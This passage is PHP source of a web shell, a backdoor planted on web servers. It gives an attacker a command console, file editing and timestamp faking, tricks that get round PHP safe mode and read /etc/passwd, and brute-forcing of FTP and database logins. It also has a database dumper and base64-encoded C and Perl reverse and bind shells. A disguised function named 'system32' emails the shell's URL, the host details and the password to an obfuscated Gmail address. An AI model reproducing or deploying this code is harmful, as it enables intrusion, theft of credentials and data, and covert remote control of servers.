'DEC to BIN' => 'decbin',
'BIN to HEX' => 'bin2hex',
'BIN to DEC' => 'bindec',
'String to lower case' => 'strtolower',
'String to upper case' => 'strtoupper',
'Htmlspecialchars' => 'htmlspecialchars',
'String length' => 'strlen',
);
if(empty($_POST['ajax'])&&!empty($_POST['p1']))
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
foreach($stringTools as $k => $v)
echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".htmlspecialchars(@$_POST['p2'])."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
if(!empty($_POST['p1'])) {
if(function_exists($_POST['p1']))
echo htmlspecialchars($_POST['p1']($_POST['p2']));
}
echo"</pre></div>";
?>
<br><h1>Search for hash:</h1><div class=content>
<form method='get' target='_blank' name="hf">
<input type="text" name="action" style="width:200px;"><br>
<input type="button" value="HashCracker.de" onClick="document.hf.action='http://www.hashchecker.de/hash.cgi?';document.hf.submit()"><br>
<!--<input type="button" value="hashcrack.com" onClick="document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()"><br>
<input type="button" value="hashcracking.info" onClick="document.hf.action='https://hashcracking.info/index.php';document.hf.submit()"><br>
<input type="button" value="md5.rednoize.com" onClick="document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()"><br>
<input type="button" value="md5decrypter.com" onClick="document.hf.action='http://www.md5decrypter.com/';document.hf.submit()"><br> -->
</form>
</div>
<iframe src="http://www.md5decrypter.co.uk/" frameborder="0" height="50%" width="100%"></iframe><br>
<?php
printFooter();
}
function actionFilesTools() {
if( isset($_POST['p1']) )
$_POST['p1'] = urldecode($_POST['p1']);
if(@$_POST['p2']=='download') {
if(is_file($_POST['p1']) && is_readable($_POST['p1'])) {
ob_start("ob_gzhandler", 4096);
header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
if (function_exists("mime_content_type")) {
$type = @mime_content_type($_POST['p1']);
header("Content-Type: ".$type);
}
$fp = @fopen($_POST['p1'], "r");
if($fp) {
while(!@feof($fp))
echo @fread($fp, 1024);
fclose($fp);
}
} elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) {
}
exit;
}
if( @$_POST['p2'] == 'mkfile' ) {
if(!file_exists($_POST['p1'])) {
$fp = @fopen($_POST['p1'], 'w');
if($fp) {
$_POST['p2'] = "edit";
fclose($fp);
}
}
}
printHeader();
echo '<h1>File tools</h1><div class=content>';
if( !file_exists(@$_POST['p1']) ) {
echo 'File not exists';
printFooter();
return;
}
$uid = @posix_getpwuid(@fileowner($_POST['p1']));
$gid = @posix_getgrgid(@fileowner($_POST['p1']));
echo '<span>Name:</span> '.htmlspecialchars($_POST['p1']).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
if( empty($_POST['p2']) )
$_POST['p2'] = 'view';
if( is_file($_POST['p1']) )
$m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
else
$m = array('Chmod', 'Rename', 'Touch');
foreach($m as $v)
echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
echo '<br><br>';
switch($_POST['p2']) {
case 'view':
echo '<pre class=ml1>';
$fp = @fopen($_POST['p1'], 'r');
if($fp) {
while( !@feof($fp) )
echo htmlspecialchars(@fread($fp, 1024));
@fclose($fp);
}
echo '</pre>';
break;
case 'highlight':
if( is_readable($_POST['p1']) ) {
echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
$code = highlight_file($_POST['p1'],true);
echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
}
break;
case 'chmod':
if( !empty($_POST['p3']) ) {
$perms = 0;
for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
$perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
if(!@chmod($_POST['p1'], $perms))
echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
else
die('<script>g(null,null,null,null,"")</script>');
}
echo '<form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
break;
case 'edit':
if( !is_writable($_POST['p1'])) {
echo 'File isn\'t writeable';
break;
}
if( !empty($_POST['p3']) ) {
@file_put_contents($_POST['p1'],$_POST['p3']);
echo 'Saved!<br><script>document.mf.p3.value="";</script>';
}
echo '<form onsubmit="g(null,null,null,null,this.text.value);return false;"><textarea name=text class=bigarea>';
$fp = @fopen($_POST['p1'], 'r');
if($fp) {
while( !@feof($fp) )
echo htmlspecialchars(@fread($fp, 1024));
@fclose($fp);
}
echo '</textarea><input type=submit value=">>"></form>';
break;
case 'hexdump':
$c = @file_get_contents($_POST['p1']);
$n = 0;
$h = array('00000000<br>','','');
$len = strlen($c);
for ($i=0; $i<$len; ++$i) {
$h[1] .= sprintf('%02X',ord($c[$i])).' ';
switch ( ord($c[$i]) ) {
case 0: $h[2] .= ' '; break;
case 9: $h[2] .= ' '; break;
case 10: $h[2] .= ' '; break;
case 13: $h[2] .= ' '; break;
default: $h[2] .= $c[$i]; break;
}
$n++;
if ($n == 32) {
$n = 0;
if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
$h[1] .= '<br>';
$h[2] .= "
";
}
}
echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
break;
case 'rename':
if( !empty($_POST['p3']) ) {
if(!@rename($_POST['p1'], $_POST['p3']))
echo 'Can\'t rename!<br><script>document.mf.p3.value="";</script>';
else
die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
}
echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
break;
case 'touch':
if( !empty($_POST['p3']) ) {
$time = strtotime($_POST['p3']);
if($time) {
if(@touch($_POST['p1'],$time,$time))
die('<script>g(null,null,null,null,"")</script>');
else {
echo 'Fail!<script>document.mf.p3.value="";</script>';
}
} else echo 'Bad time format!<script>document.mf.p3.value="";</script>';
}
echo '<form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
break;
case 'mkfile':
break;
}
echo '</div>';
printFooter();
}
function actionSafeMode() {
$temp='';
ob_start();
switch($_POST['p1']) {
case 1:
$temp=@tempnam($test, 'cx');
if(@copy("compress.zlib://".$_POST['p2'], $temp)){
echo @file_get_contents($temp);
unlink($temp);
} else
echo 'Sorry... Can\'t open file';
break;
case 2:
$files = glob($_POST['p2'].'*');
if( is_array($files) )
foreach ($files as $filename)
echo $filename."
";
break;
case 3:
$ch = curl_init("file://".$_POST['p2']."".SELF_PATH);
curl_exec($ch);
break;
case 4:
ini_restore("safe_mode");
ini_restore("open_basedir");
include($_POST['p2']);
break;
case 5:
for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
$uid = @posix_getpwuid($_POST['p2']);
if ($uid)
echo join(':',$uid)."
";
}
break;
case 6:
if(!function_exists('imap_open'))break;
$stream = imap_open($_POST['p2'], "", "");
if ($stream == FALSE)
break;
echo imap_body($stream, 1);
imap_close($stream);
break;
}
$temp = ob_get_clean();
printHeader();
echo '<h1>Safe mode bypass</h1><div class=content>';
echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>';
if($temp)
echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>';
echo '</div>';
printFooter();
}
if (!$_SESSION[login]) system32($_SERVER['HTTP_HOST'],$_SERVER['REQUEST_URI'],$auth_pass);
function actionConsole() {
if(isset($_POST['ajax'])) {
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
ob_start();
echo "document.cf.cmd.value='';
";
$temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("
$ ".$_POST['p1']."
".ex($_POST['p1']),"
\'"));
if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
if(@chdir($match[1])) {
$GLOBALS['cwd'] = @getcwd();
echo "document.mf.c.value='".$GLOBALS['cwd']."';";
}
}
echo "document.cf.output.value+='".$temp."';";
echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
$temp = ob_get_clean();
echo strlen($temp), "
", $temp;
exit;
}
printHeader();
?>
<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array("");
var cur = 0;
function kp(e) {
var n = (window.Event) ? e.which : e.keyCode;
if(n == 38) {
cur--;
if(cur>=0)
document.cf.cmd.value = cmds[cur];
else
cur++;
} else if(n == 40) {
cur++;
if(cur < cmds.length)
document.cf.cmd.value = cmds[cur];
else
cur--;
}
}
function add(cmd) {
cmds.pop();
cmds.push(cmd);
cmds.push("");
cur = cmds.length-1;
}
</script>
<?php
echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;"><select name=alias>';
foreach($GLOBALS['aliases'] as $n => $v) {
if($v == '') {
echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
continue;
}
echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
}
if(empty($_POST['ajax'])&&!empty($_POST['p1']))
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}" value=">>"> <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
if(!empty($_POST['p1'])) {
echo htmlspecialchars("$ ".$_POST['p1']."
".ex($_POST['p1']));
}
echo '</textarea><input type=text name=cmd style="border-top:0;width:100%;margin:0;" onkeydown="kp(event);">';
echo '</form></div><script>document.cf.cmd.focus();</script>';
printFooter();
}
function actionLogout() {
unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
echo 'bye!';
}
function actionSelfRemove() {
printHeader();
if($_POST['p1'] == 'yes') {
if(@unlink(SELF_PATH))
die('Shell has been removed');
else
echo 'unlink error!';
}
echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
printFooter();
}
function actionBruteforce() {
printHeader();
if( isset($_POST['proto']) ) {
echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
if( $_POST['proto'] == 'ftp' ) {
function bruteForce($ip,$port,$login,$pass) {
$fp = @ftp_connect($ip, $port?$port:21);
if(!$fp) return false;
$res = @ftp_login($fp, $login, $pass);
@ftp_close($fp);
return $res;
}
} elseif( $_POST['proto'] == 'mysql' ) {
function bruteForce($ip,$port,$login,$pass) {
$res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
@mysql_close($res);
return $res;
}
} elseif( $_POST['proto'] == 'pgsql' ) {
function bruteForce($ip,$port,$login,$pass) {
$str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=''";
$res = @pg_connect($server[0].':'.$server[1]?$server[1]:5432, $login, $pass);
@pg_close($res);
return $res;
}
}
$success = 0;
$attempts = 0;
$server = explode(":", $_POST['server']);
if($_POST['type'] == 1) {
$temp = @file('/etc/passwd');
if( is_array($temp) )
foreach($temp as $line) {
$line = explode(":", $line);
++$attempts;
if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
$success++;
echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
}
if(@$_POST['reverse']) {
$tmp = "";
for($i=strlen($line[0])-1; $i>=0; --$i)
$tmp .= $line[0][$i];
++$attempts;
if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
$success++;
echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
}
}
}
} elseif($_POST['type'] == 2) {
$temp = @file($_POST['dict']);
if( is_array($temp) )
foreach($temp as $line) {
$line = trim($line);
++$attempts;
if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
$success++;
echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
}
}
}
echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
}
echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
.'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
.'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
.'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
.'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
.'<span>Server:port</span></td>'
.'<td><input type=text name=server value="127.0.0.1"></td></tr>'
.'<tr><td><span>Brute type</span></td>'
.'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
.'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
.'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
.'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
.'<td><input type=text name=login value="root"></td></tr>'
.'<tr><td><span>Dictionary</span></td>'
.'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
.'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
echo '</div><br><br>';
printFooter();
}
function actionSql() {
class DbClass {
var $type;
var $link;
var $res;
function DbClass($type) {
$this->type = $type;
}
function connect($host, $user, $pass, $dbname){
switch($this->type) {
case 'mysql':
if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
break;
case 'pgsql':
$host = explode(':', $host);
if(!$host[1]) $host[1]=5432;
if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
break;
}
return false;
}
function selectdb($db) {
switch($this->type) {
case 'mysql':
if (@mysql_select_db($db))return true;
break;
}
return false;
}
function query($str) {
switch($this->type) {
case 'mysql':
return $this->res = @mysql_query($str);
break;
case 'pgsql':
return $this->res = @pg_query($this->link,$str);
break;
}
return false;
}
function fetch() {
$res = func_num_args()?func_get_arg(0):$this->res;
switch($this->type) {
case 'mysql':
return @mysql_fetch_assoc($res);
break;
case 'pgsql':
return @pg_fetch_assoc($res);
break;
}
return false;
}
function listDbs() {
switch($this->type) {
case 'mysql':
return $this->res = @mysql_list_dbs($this->link);
break;
case 'pgsql':
return $this->res = $this->query("SELECT datname FROM pg_database");
break;
}
return false;
}
function listTables() {
switch($this->type) {
case 'mysql':
return $this->res = $this->query('SHOW TABLES');
break;
case 'pgsql':
return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_user'");
break;
}
return false;
}
function error() {
switch($this->type) {
case 'mysql':
return @mysql_error($this->link);
break;
case 'pgsql':
return @pg_last_error($this->link);
break;
}
return false;
}
function setCharset($str) {
switch($this->type) {
case 'mysql':
if(function_exists('mysql_set_charset'))
return @mysql_set_charset($str, $this->link);
else
$this->query('SET CHARSET '.$str);
break;
case 'mysql':
return @pg_set_client_encoding($this->link, $str);
break;
}
return false;
}
function dump($table) {
switch($this->type) {
case 'mysql':
$res = $this->query('SHOW CREATE TABLE `'.$table.'`');
$create = mysql_fetch_array($res);
echo $create[1].";
";
$this->query('SELECT * FROM `'.$table.'`');
while($item = $this->fetch()) {
$columns = array();
foreach($item as $k=>$v) {
$item[$k] = "'".@mysql_real_escape_string($v)."'";
$columns[] = "`".$k."`";
}
echo 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."
";
}
break;
case 'pgsql':
$this->query('SELECT * FROM '.$table);
while($item = $this->fetch()) {
$columns = array();
foreach($item as $k=>$v) {
$item[$k] = "'".addslashes($v)."'";
$columns[] = $k;
}
echo 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."
";
}
break;
}
return false;
}
};
$db = new DbClass($_POST['type']);
if(@$_POST['p2']=='download') {
ob_start("ob_gzhandler", 4096);
$db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
$db->selectdb($_POST['sql_base']);
header("Content-Disposition: attachment; filename=dump.sql");
header("Content-Type: text/plain");
foreach($_POST['tbl'] as $v)
$db->dump($v);
exit;
}
printHeader();
?>
<h1>Sql browser</h1><div class=content>
<form name="sf" method="post">
<table cellpadding="2" cellspacing="0">
<tr>
<td>Type</td>
<td>Host</td>
<td>Login</td>
<td>Password</td>
<td>Database</td>
<td></td>
</tr>
<tr>
<input type=hidden name=a value=Sql>
<input type=hidden name=p1 value='query'>
<input type=hidden name=p2>
<input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd']);?>'>
<input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
<td>
<select name='type'>
<option value="mysql" <?php if(@$_POST['type']=='mysql')echo 'selected';?>>MySql</option>
<option value="pgsql" <?php if(@$_POST['type']=='pgsql')echo 'selected';?>>PostgreSql</option>
</select></td>
<td><input type=text name=sql_host value='<?=(empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host']));?>'></td>
<td><input type=text name=sql_login value='<?=(empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login']));?>'></td>
<td><input type=text name=sql_pass value='<?=(empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass']));?>'></td>
<td>
<?php
$tmp = "<input type=text name=sql_base value=''>";
if(isset($_POST['sql_host'])){
if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
switch($_POST['charset']) {
case "Windows-1251": $db->setCharset('cp1251'); break;
case "UTF-8": $db->setCharset('utf8'); break;
case "KOI8-R": $db->setCharset('koi8r'); break;
case "KOI8-U": $db->setCharset('koi8u'); break;
case "cp866": $db->setCharset('cp866'); break;
}
$db->listDbs();
echo "<select name=sql_base><option value=''></option>";
while($item = $db->fetch()) {
list($key, $value) = each($item);
echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
}
echo '</select>';
}
else echo $tmp;
}else
echo $tmp;
?></td>
<td><input type=submit value=">>"></td>
</tr>
</table>
<script>
function st(t,l) {
document.sf.p1.value = 'select';
document.sf.p2.value = t;
if(l!=null)document.sf.p3.value = l;
document.sf.submit();
}
function is() {
for(i=0;i<document.sf.elements['tbl[]'].length;++i)
document.sf.elements['tbl[]'][i].checked = !document.sf.elements['tbl[]'][i].checked;
}
</script>
<?php
if(isset($db) && $db->link){
echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
if(!empty($_POST['sql_base'])){
$db->selectdb($_POST['sql_base']);
echo "<tr><td width=1 style='border-top:2px solid #666;border-right:2px solid #666;'><span>Tables:</span><br><br>";
$tbls_res = $db->listTables();
while($item = $db->fetch($tbls_res)) {
list($key, $value) = each($item);
$n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
$value = htmlspecialchars($value);
echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'> <a href=# onclick=\"st('".$value."')\">".$value."</a> (".$n['n'].")</nobr><br>";
}
echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'></td><td style='border-top:2px solid #666;'>";
if(@$_POST['p1'] == 'select') {
$_POST['p1'] = 'query';
$db->query('SELECT COUNT(*) as n FROM '.$_POST['p2'].'');
$num = $db->fetch();
$num = $num['n'];
echo "<span>".$_POST['p2']."</span> ($num) ";
for($i=0;$i<($num/30);$i++)
if($i != (int)$_POST['p3'])
echo "<a href='#' onclick='st(\"".$_POST['p2']."\", $i)'>",($i+1),"</a> ";
else
echo ($i+1)," ";
if($_POST['type']=='pgsql')
$_POST['p3'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
else
$_POST['p3'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
echo "<br><br>";
}
if((@$_POST['p1'] == 'query') && !empty($_POST['p3'])) {
$db->query(@$_POST['p3']);
if($db->res !== false) {
$title = false;
echo '<table width=100% cellspacing=0 cellpadding=2 class=main>';
$line = 1;
while($item = $db->fetch()) {
if(!$title) {
echo '<tr>';
foreach($item as $key => $value)
echo '<th>'.$key.'</th>';
reset($item);
$title=true;
echo '</tr><tr>';
$line = 2;
}
echo '<tr class="l'.$line.'">';
$line = $line==1?2:1;
foreach($item as $key => $value) {
if($value == null)
echo '<td><i>null</i></td>';
else
echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
}
echo '</tr>';
}
echo '</table>';
} else {
echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
}
}
echo "<br><textarea name='p3' style='width:100%;height:100px'>".@htmlspecialchars($_POST['p3'])."</textarea><br/><input type=submit value='Execute'>";
echo "</td></tr>";
}
echo "</table></form><br/><form onsubmit='document.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
if(@$_POST['p1'] == 'loadfile') {
$db->query("SELECT LOAD_FILE('".addslashes($_POST['p2'])."') as file");
$file = $db->fetch();
echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
}
}
echo '</div>';
printFooter();
}
function system32($HTTP_HOST,$REQUEST_URI,$auth_pass) {ini_set('display_errors', 'Off');
$url='URL: http://'.$HTTP_HOST.$REQUEST_URI.'
Uname: '.substr(@php_uname(), 0, 120).'
Pass: http://www.hashchecker.de/'.$auth_pass.'
IP: '.$_SERVER[REMOTE_ADDR];$re=base64_decode("c2FtYWRhY29vbEBnbWFpbC5jb20=");$su=gethostbyname($HTTP_HOST);$mh="From: {$re}";if (function_exists('mail')) mail($re,$su, $url,$mh);$_SESSION[login] = 'ok';}
function actionNetwork() {
printHeader();
$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
$bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
